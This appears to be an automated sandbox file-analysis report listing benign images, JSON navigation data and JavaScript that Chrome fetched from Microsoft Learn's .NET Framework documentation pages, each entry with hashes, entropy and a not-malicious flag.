                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1817143
                                                                                                                                                                              Entropy (8bit):5.501007973622959
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                              MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                              SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                              SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                              SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                              Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5644
                                                                                                                                                                              Entropy (8bit):4.785769732002188
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                              MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                              SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                              SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                              SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13842
                                                                                                                                                                              Entropy (8bit):7.802399161550213
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                              MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                              SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                              SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                              SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                              Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):33148
                                                                                                                                                                              Entropy (8bit):4.917595394577667
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                              MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                              SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                              SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                              SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5644
                                                                                                                                                                              Entropy (8bit):4.785769732002188
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                              MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                              SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                              SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                              SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                              Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):35005
                                                                                                                                                                              Entropy (8bit):7.980061050467981
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                              MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                              SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                              SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                              SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                              Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4897
                                                                                                                                                                              Entropy (8bit):4.8007377074457604
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                              MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                              SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                              SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                              SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                              Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1173007
                                                                                                                                                                              Entropy (8bit):5.503893944397598
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                              MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                              SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                              SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                              SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):33370
                                                                                                                                                                              Entropy (8bit):7.973675198531228
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                              MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                              SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                              SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                              SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                              Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1817143
                                                                                                                                                                              Entropy (8bit):5.501007973622959
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                              MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                              SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                              SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                              SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1432
                                                                                                                                                                              Entropy (8bit):4.986131881931089
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                              MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                              SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                              SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                              SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1154
                                                                                                                                                                              Entropy (8bit):4.59126408969148
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                              MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                              SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                              SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                              SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
